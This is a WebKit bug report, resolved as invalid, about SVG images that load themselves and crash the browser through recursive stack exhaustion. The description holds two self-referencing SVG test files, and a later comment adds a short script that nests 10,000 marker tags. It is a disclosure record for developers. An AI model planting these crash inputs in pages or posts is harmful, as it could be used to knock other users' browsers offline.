Bug 39675 - SVG recursion stack exhaustion crashes.
Summary: SVG recursion stack exhaustion crashes.
Status: RESOLVED INVALID
Alias: None
Product: WebKit
Classification: Unclassified
Component: SVG (show other bugs)
Version: 528+ (Nightly build)
Hardware: PC Windows Vista
: P1 Normal
Assignee: Nobody
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2010-05-25 08:22 PDT by Berend-Jan Wever
Modified: 2016-10-12 05:58 PDT (History)
3 users (show)

See Also:

Attachments
Recursion test (768 bytes, application/zip)
2016-10-12 05:57 PDT, Dirk Schulze 		no flags Details
View All Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Berend-Jan Wever 2010-05-25 08:22:36 PDT 
Having an SVG image load itself through an svg "image" tag or an html "img" tag using foreignObject causes infinite recursion, which crashes the browser. I'm creating one bug for both because they are essentially caused by the same problem. Feel free to split them if you think that works better.

-- html "img" tag --
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" width="1063" height="638">
  <foreignObject>
    <body xmlns="http://www.w3.org/1999/xhtml">
      <img src="[url to this .svg file]" />
    </body>
  </foreignObject>
</svg>

Chromium bug: http://code.google.com/p/chromium/issues/detail?id=44995
Repro: http://skypher.com/SkyLined/Repro/Chrome/44995%20-%20WebCore..FrameView..paintContents%20RecursionSOV%20(1b0fa0eb19ffe8d1d29dd7a361a99ee0)/repro.svg

-- svg "image" tag --
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" width="1063" height="638">
  <image x="0" y="0" width="1063" height="638" xlink:href="[url to this .svg file]" />
</svg>

Chromium bug: http://code.google.com/p/chromium/issues/detail?id=44998
Repro: http://skypher.com/SkyLined/Repro/Chrome/44998%20-%20WebCore..CachedImage..changedInRect%20RecursionSOV%20(512de755335cb1ab73932c04c63216ba)/repro.svg

Marking as security: Because many chat/forum websites allow users to insert images with arbitrary URLs, these crashes can be used as a DoS against these websites.
Comment 1 Berend-Jan Wever 2010-11-22 04:44:30 PST 
Another way to trigger stack exhaustion through recursion:

<script>
s = new Array(10000).join('<marker>');
document.writeln('<svg>' + s);
</script>
Comment 2 Berend-Jan Wever 2010-12-01 07:38:00 PST 
This is not a security issue
Comment 3 Alexey Proskuryakov 2011-01-11 09:44:41 PST 
> Another way to trigger stack exhaustion through recursion:

That sounds like bug 15123.
Comment 4 Dirk Schulze 2016-10-12 05:57:35 PDT 
Created attachment 291351 [details]
Recursion test

Test for recursion
Comment 5 Dirk Schulze 2016-10-12 05:58:19 PDT 
The recursion is not a problem.